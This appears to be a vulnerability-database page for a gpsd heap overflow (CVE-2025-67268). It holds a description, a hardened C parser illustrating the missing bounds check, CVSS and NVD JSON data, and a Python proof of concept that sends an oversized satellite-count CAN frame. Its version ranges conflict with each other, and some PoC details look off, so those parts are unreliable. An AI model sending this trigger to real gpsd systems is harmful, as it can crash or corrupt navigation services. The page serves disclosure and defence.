Security Vulnerability Report
CVE-2025-67268 CVSS 9.8 CRITICAL

CVE-2025-67268

Published: 2026-01-02 16:17:01
Last Modified: 2026-01-12 15:33:46

Description

gpsd before commit dc966aa contains a heap-based out-of-bounds write vulnerability in the drivers/driver_nmea2000.c file. The hnd_129540 function, which handles NMEA2000 PGN 129540 (GNSS Satellites in View) packets, fails to validate the user-supplied satellite count against the size of the skyview array (184 elements). This allows an attacker to write beyond the bounds of the array by providing a satellite count up to 255, leading to memory corruption, Denial of Service (DoS), and potentially arbitrary code execution.
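The defect described above is a missing comparison between an attacker-controlled count byte and the capacity of the array it indexes. The following C program is an added illustration of the hardened form of such a handler; it is not gpsd's code, and the struct names, the `SKYVIEW_MAX` constant (set to the 184 entries the advisory mentions) and the 5-byte-per-satellite record layout are this example's own assumptions, not the real PGN 129540 encoding. The parser rejects a count above the array capacity and a message shorter than the count implies before writing a single element, which is the check whose absence turns a count of 255 into an out-of-bounds write.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Capacity of the receiving array. The advisory gives 184 entries; the
 * names and the record layout below are this example's own, not gpsd's. */
#define SKYVIEW_MAX 184
#define SAT_REC_LEN 5   /* constructed layout: 5 bytes per satellite record */

struct sat {
    uint8_t  prn;
    uint8_t  elevation;
    uint16_t azimuth;
    uint8_t  snr;
};

struct skyview {
    size_t     nsats;
    struct sat sats[SKYVIEW_MAX];
};

enum parse_result { PARSE_OK = 0, PARSE_TOO_MANY = -1, PARSE_SHORT = -2 };

/*
 * Hardened handler. The count in byte 0 is attacker-controlled (0..255),
 * so it is checked against the array capacity AND against the number of
 * bytes actually received before any element is written. Omitting the
 * first check is the defect class the advisory describes.
 */
int parse_satellites(const uint8_t *buf, size_t len, struct skyview *sv)
{
    if (len < 1)
        return PARSE_SHORT;
    size_t count = buf[0];
    if (count > SKYVIEW_MAX)                 /* the missing bounds check */
        return PARSE_TOO_MANY;
    if (len < 1 + count * SAT_REC_LEN)       /* also refuse to over-read */
        return PARSE_SHORT;

    memset(sv, 0, sizeof *sv);
    for (size_t i = 0; i < count; i++) {
        const uint8_t *rec = buf + 1 + i * SAT_REC_LEN;
        sv->sats[i].prn       = rec[0];
        sv->sats[i].elevation = rec[1];
        sv->sats[i].azimuth   = (uint16_t)(rec[2] | (rec[3] << 8));
        sv->sats[i].snr       = rec[4];
    }
    sv->nsats = count;
    return PARSE_OK;
}

/* Build a constructed test message claiming `count` satellites.
 * Returns the message length, or 0 if `out` is too small. */
size_t build_message(uint8_t count, uint8_t *out, size_t outlen)
{
    size_t need = 1 + (size_t)count * SAT_REC_LEN;
    if (outlen < need)
        return 0;
    out[0] = count;
    for (size_t i = 0; i < count; i++) {
        uint8_t *rec = out + 1 + i * SAT_REC_LEN;
        rec[0] = (uint8_t)(i + 1);   /* PRN */
        rec[1] = 45;                 /* elevation, degrees */
        rec[2] = (uint8_t)i;         /* azimuth low byte */
        rec[3] = 0;                  /* azimuth high byte */
        rec[4] = 30;                 /* SNR */
    }
    return need;
}

int main(void)
{
    static uint8_t msg[1 + 255 * SAT_REC_LEN];
    static struct skyview sv;
    const uint8_t counts[] = { 10, SKYVIEW_MAX, 200, 255 };

    for (size_t i = 0; i < sizeof counts; i++) {
        size_t n = build_message(counts[i], msg, sizeof msg);
        int rc = parse_satellites(msg, n, &sv);
        printf("count=%3u -> rc=%d (%s)\n", (unsigned)counts[i], rc,
               rc == PARSE_OK ? "accepted" : "rejected before any write");
    }
    return 0;
}
```

Rejecting rather than silently clamping the count is deliberate: a clamp would keep the process alive but desynchronise the parser from the remaining bytes, whereas an explicit error code lets the caller log the malformed message and drop it.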

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gpsd_project:gpsd:*:*:*:*:*:*:*:* - VULNERABLE
gpsd < dc966aa74c075d0a6535811d98628625cbfbe3f4
gpsd 3.24.1 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67268 PoC - Malicious NMEA2000 PGN 129540 Packet
# This PoC demonstrates the heap overflow in gpsd's NMEA2000 driver
import socket
import struct


def create_malicious_pgn129540(satellite_count=255):
    """
    Construct a malicious NMEA2000 PGN 129540 CAN frame
    PGN 129540: GNSS Satellites in View
    """
    # CAN ID for PGN 129540 (Priority 3, PGN 129540, Source 0x00)
    can_id = (3 << 26) | (129540 << 8) | 0x00
    # Data Length Code (DLC) - max 8 bytes for standard CAN
    dlc = 8
    # Payload construction
    # Byte 0-1: Number of satellites (0-255, we use >184 to trigger overflow)
    # Bytes 2-7: Additional satellite data
    data = struct.pack('<H', satellite_count)  # Satellite count
    data += b'\x00' * 6                        # Padding/additional data
    # Pad to 8 bytes
    data = data.ljust(8, b'\x00')
    return can_id, dlc, data


def send_malicious_packet(target_ip, can_interface='can0'):
    """
    Send malicious CAN frame to trigger gpsd vulnerability

    Note: a CAN_RAW socket is bound to a local CAN interface, so target_ip
    is unused by this function.
    """
    sock = None
    try:
        sock = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        sock.bind((can_interface,))
        can_id, dlc, data = create_malicious_pgn129540(255)
        # Construct raw CAN frame: struct can_frame is a 32-bit can_id,
        # an 8-bit DLC, 3 padding bytes and 8 data bytes
        can_frame = struct.pack('=IB3x8s', can_id, dlc, data)
        sock.send(can_frame)
        print(f"[+] Sent malicious PGN 129540 packet with {255} satellites")
        print("[+] Expected skyview array size: 184")
        print("[+] This will cause heap overflow in gpsd")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        if sock is not None:
            sock.close()


if __name__ == '__main__':
    # Target configuration
    TARGET_IP = '192.168.1.100'  # gpsd server IP (unused for CAN_RAW sockets)
    print("CVE-2025-67268 PoC - gpsd heap overflow in driver_nmea2000.c")
    print("=" * 60)
    # Send multiple packets to increase exploit reliability
    for i in range(5):
        send_malicious_packet(TARGET_IP)
```

References

https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67268/README.md (Exploit, Third Party Advisory)
https://github.com/ntpsec/gpsd/blob/master/drivers/driver_nmea2000.c (Product)
https://github.com/ntpsec/gpsd/commit/dc966aa74c075d0a6535811d98628625cbfbe3f4 (Patch)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67268",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-02T16:17:00.990",
    "lastModified": "2026-01-12T15:33:45.577",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "gpsd before commit dc966aa contains a heap-based out-of-bounds write vulnerability in the drivers/driver_nmea2000.c file. The hnd_129540 function, which handles NMEA2000 PGN 129540 (GNSS Satellites in View) packets, fails to validate the user-supplied satellite count against the size of the skyview array (184 elements). This allows an attacker to write beyond the bounds of the array by providing a satellite count up to 255, leading to memory corruption, Denial of Service (DoS), and potentially arbitrary code execution."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-122"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gpsd_project:gpsd:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.27.1",
                "matchCriteriaId": "8CBC8583-D71F-4E6F-AB7D-51A3C15270B9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67268/README.md",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/ntpsec/gpsd/blob/master/drivers/driver_nmea2000.c",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/ntpsec/gpsd/commit/dc966aa74c075d0a6535811d98628625cbfbe3f4",
        "source": "[email protected]",
        "tags": ["Patch"]
      }
    ]
  }
}
```